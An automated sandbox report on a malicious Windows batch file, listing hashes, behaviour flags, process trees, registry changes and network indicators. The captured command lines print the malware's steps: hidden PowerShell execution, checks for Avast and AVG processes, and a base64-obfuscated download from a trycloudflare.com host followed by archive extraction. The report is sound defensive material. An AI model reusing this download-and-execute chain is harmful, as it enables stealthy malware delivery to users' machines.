Sample: /tink.bat

Full analysis: https://app.any.run/tasks/5a8a556e-aa8d-4227-8036-97ddbd387bf3
Verdict: Malicious activity
Analysis date: April 15, 2025, 19:35:18
OS: Windows 11 Professional (build: 22000, 64 bit)
Indicators:
MIME: text/plain
File info: Unicode text, UTF-16, little-endian text, with very long lines (19932), with no line terminators
MD5: 8BFC2E4C7EE611FC0F7B15006AF299AB
SHA1: F08195863426C9DAE4F1FC89014E9AE49AE576FD
SHA256: 759D6929E4456668A93D92B2AEA311D9B7590EBAB4A4DA3CD8602B8C0B8111D5
SSDEEP: 192:pkq0gVnNPXmZ+cmNrhLOeL5jF8ya1A7L3RAP8OX+sdIT+PYCnJBh+8xP1qhVAgkU:l/ynWZI8nRnwnk9lnP

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Run PowerShell with an invisible window
      • powershell.exe (PID: 3884)
    • Antivirus name has been found in the command line (generic signature)
      • tasklist.exe (PID: 5176)
      • find.exe (PID: 2836)
      • find.exe (PID: 3512)
      • tasklist.exe (PID: 1104)
  • SUSPICIOUS
    • Starts process via Powershell
      • powershell.exe (PID: 3884)
    • Starts POWERSHELL.EXE for commands execution
      • cmd.exe (PID: 4012)
      • cmd.exe (PID: 5428)
    • Executing commands from a ".bat" file
      • powershell.exe (PID: 3884)
    • Reads the Internet Settings
      • powershell.exe (PID: 3884)
      • powershell.exe (PID: 3780)
    • Starts CMD.EXE for commands execution
      • powershell.exe (PID: 3884)
    • Get information on the list of running processes
      • cmd.exe (PID: 5428)
    • Uses base64 encoding (POWERSHELL)
      • powershell.exe (PID: 3780)
    • Gets file extension (POWERSHELL)
      • powershell.exe (PID: 4632)
    • Executable content was dropped or overwritten
      • powershell.exe (PID: 4632)
    • Process drops python dynamic module
      • powershell.exe (PID: 4632)
  • INFO
    • Checks proxy server information
      • powershell.exe (PID: 3780)
    • Disables trace logs
      • powershell.exe (PID: 3780)
    • Checks whether the specified file exists (POWERSHELL)
      • powershell.exe (PID: 4632)
    • Checks if a key exists in the options dictionary (POWERSHELL)
      • powershell.exe (PID: 4632)
    • The sample compiled with english language support
      • powershell.exe (PID: 4632)
No Malware configuration.

TRiD

.txt | Text - UTF-16 (LE) encoded (66.6)
.mp3 | MP3 audio (33.3)
Total processes: 118
Monitored processes: 12
Malicious processes: 2
Suspicious processes: 2


Process information

PID: 1104
CMD: tasklist /FI "IMAGENAME eq avgui.exe"
Path: C:\Windows\System32\tasklist.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Lists the current running tasks
Exit code:
0
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\tasklist.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
PID: 1428
CMD: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
PID: 1664
CMD: C:\Windows\system32\svchost.exe -k NetworkService -p
Path: C:\Windows\System32\svchost.exe
Parent process: services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\bcryptprimitives.dll
PID: 2836
CMD: find /i "AvastUI.exe"
Path: C:\Windows\System32\find.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Find String (grep) Utility
Exit code:
1
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\find.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ulib.dll
c:\windows\system32\fsutilext.dll
PID: 3512
CMD: find /i "avgui.exe"
Path: C:\Windows\System32\find.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Find String (grep) Utility
Exit code:
1
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\find.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ulib.dll
c:\windows\system32\fsutilext.dll
PID: 3780
CMD: powershell -Command "irm ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly9kaXktc29sdXRpb24td2FycmlvcnMtd29ya2Zsb3cudHJ5Y2xvdWRmbGFyZS5jb20vYmFiLnppcA=='))) -OutFile 'C:\Users\admin\Downloads\downloaded.zip' -ErrorAction Stop"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 3884
CMD: powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"C:\Users\admin\Desktop\tink.bat\" hidden' -WindowStyle Hidden"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 4012
CMD: C:\Windows\system32\cmd.exe /c ""C:\Users\admin\Desktop\tink.bat" "
Path: C:\Windows\System32\cmd.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
PID: 4632
CMD: powershell -Command "try { Expand-Archive -Path 'C:\Users\admin\Downloads\downloaded.zip' -DestinationPath 'C:\Users\admin\Downloads\Extracted' -Force } catch { exit 1 }"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 5176
CMD: tasklist /FI "IMAGENAME eq AvastUI.exe"
Path: C:\Windows\System32\tasklist.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Lists the current running tasks
Exit code:
0
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\tasklist.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
Total events: 15 106
Read events: 15 098
Write events: 8
Delete events: 0

Modification events

Process: (3884) powershell.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write | Name: ProxyBypass | Value: 1

Process: (3884) powershell.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write | Name: IntranetName | Value: 1

Process: (3884) powershell.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write | Name: UNCAsIntranet | Value: 1

Process: (3884) powershell.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write | Name: AutoDetect | Value: 0
Executable files: 41
Suspicious files: 364
Text files: 1 577
Unknown types: 0

Dropped files

PID | Process | Filename | Type
3780 | powershell.exe | C:\Users\admin\Downloads\downloaded.zip |
MD5:
SHA256:
3884 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_41k331dy.xba.ps1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3884 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_24e4almf.bra.psm1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3884 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | text
MD5: F9D7877A906C6918EF301B3CFFD301B4
SHA256: 91978D96C492ADF8923E5875DE675537E660E170DAB04E37A327EB0C3EC4654B
4632 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_brojymcc.w3g.ps1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3884 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary
MD5: 13EB55E4D5C81B5CDAE19252DE68189B
SHA256: 971369347F0372BF10C2F7C0AB2E519987C1F5FC840E66FB8F2954FE360AEAFE
3780 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ftyxwvdv.oec.psm1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3780 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_0rpowhez.qjt.ps1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4632 | powershell.exe | C:\Users\admin\Downloads\Extracted\Python\Python312\DLLs\_asyncio.pyd | executable
MD5: 28D2A0405BE6DE3D168F28109030130C
SHA256: 2DFCAEC25DE17BE21F91456256219578EAE9A7AEC5D21385DEC53D0840CF0B8D
4632 | powershell.exe | C:\Users\admin\Downloads\Extracted\Python\Python312\DLLs\_elementtree.pyd | executable
MD5: B479ED301E990690A30FC855E6B45F94
SHA256: 0C488E6883A70CD54A71A9E28796F87EF6CC0D288260A965CBB24BF1D7309A20
HTTP(S) requests: 23
TCP/UDP connections: 35
DNS requests: 15
Threats: 5

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Reputation
 | | GET | 200 | 88.221.110.147:80 | http://www.msftconnecttest.com/connecttest.txt | unknown | whitelisted
3640 | svchost.exe | GET | 200 | 184.30.131.245:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | whitelisted
4976 | MoUsoCoreWorker.exe | GET | 200 | 208.89.74.31:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?2e16a064e6a93291 | unknown | whitelisted
5136 | smartscreen.exe | GET | 200 | 184.30.131.245:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D | unknown | whitelisted
2768 | svchost.exe | GET | 200 | 199.232.210.172:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/pinrulesstl.cab?27a1f3f9d6f21f74 | unknown | whitelisted
2768 | svchost.exe | GET | 200 | 199.232.210.172:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?1ba2c49461210cde | unknown | whitelisted
2768 | svchost.exe | GET | 200 | 199.232.210.172:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?406ec4d9673749fb | unknown | whitelisted
2988 | OfficeClickToRun.exe | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEA77flR%2B3w%2FxBpruV2lte6A%3D | unknown | whitelisted
1848 | svchost.exe | POST | 403 | 95.100.186.9:80 | http://go.microsoft.com/fwlink/?LinkID=252669&clcid=0x409 | unknown | whitelisted
1848 | svchost.exe | POST | 403 | 95.100.186.9:80 | http://go.microsoft.com/fwlink/?LinkID=252669&clcid=0x409 | unknown | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
 | | 88.221.110.147:80 | | Akamai International B.V. | DE | unknown
4976 | MoUsoCoreWorker.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
4976 | MoUsoCoreWorker.exe | 208.89.74.31:80 | ctldl.windowsupdate.com | | US | whitelisted
3640 | svchost.exe | 20.190.160.17:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
3640 | svchost.exe | 184.30.131.245:80 | ocsp.digicert.com | AKAMAI-AS | US | whitelisted
5136 | smartscreen.exe | 48.209.144.71:443 | checkappexec.microsoft.com | | US | whitelisted
5136 | smartscreen.exe | 184.30.131.245:80 | ocsp.digicert.com | AKAMAI-AS | US | whitelisted
3780 | powershell.exe | 104.16.231.132:443 | diy-solution-warriors-workflow.trycloudflare.com | CLOUDFLARENET | | whitelisted
3952 | svchost.exe | 239.255.255.250:1900 | | | | whitelisted
1272 | svchost.exe | 23.197.142.186:443 | fs.microsoft.com | Akamai International B.V. | US | whitelisted

DNS requests

Domain | IP | Reputation
google.com | 142.250.185.78 | whitelisted
settings-win.data.microsoft.com | 20.73.194.208 | whitelisted
ctldl.windowsupdate.com | 208.89.74.31, 208.89.74.19, 199.232.210.172, 199.232.214.172 | whitelisted
login.live.com | 20.190.160.17, 20.190.160.22, 20.190.160.131, 20.190.160.20, 20.190.160.65, 40.126.32.138, 40.126.32.72, 20.190.160.66 | whitelisted
ocsp.digicert.com | 184.30.131.245, 2.17.190.73 | whitelisted
checkappexec.microsoft.com | 48.209.144.71 | whitelisted
diy-solution-warriors-workflow.trycloudflare.com | 104.16.231.132, 104.16.230.132 | whitelisted
fs.microsoft.com | 23.197.142.186 | whitelisted
self.events.data.microsoft.com | 20.189.173.12 | whitelisted
officeclient.microsoft.com | 52.109.89.18 | whitelisted

Threats

Class | Message
Misc activity | ET INFO Microsoft Connection Test
Potentially Bad Traffic | ET INFO Observed DNS Query to Commonly Abused Cloudflare Domain (trycloudflare .com)
Potentially Bad Traffic | SUSPICIOUS [ANY.RUN] Cloudflare Tunnel (TryCloudflare)
Misc activity | ET HUNTING TryCloudFlare Domain in TLS SNI
Misc activity | ET INFO Observed trycloudflare .com Domain in TLS SNI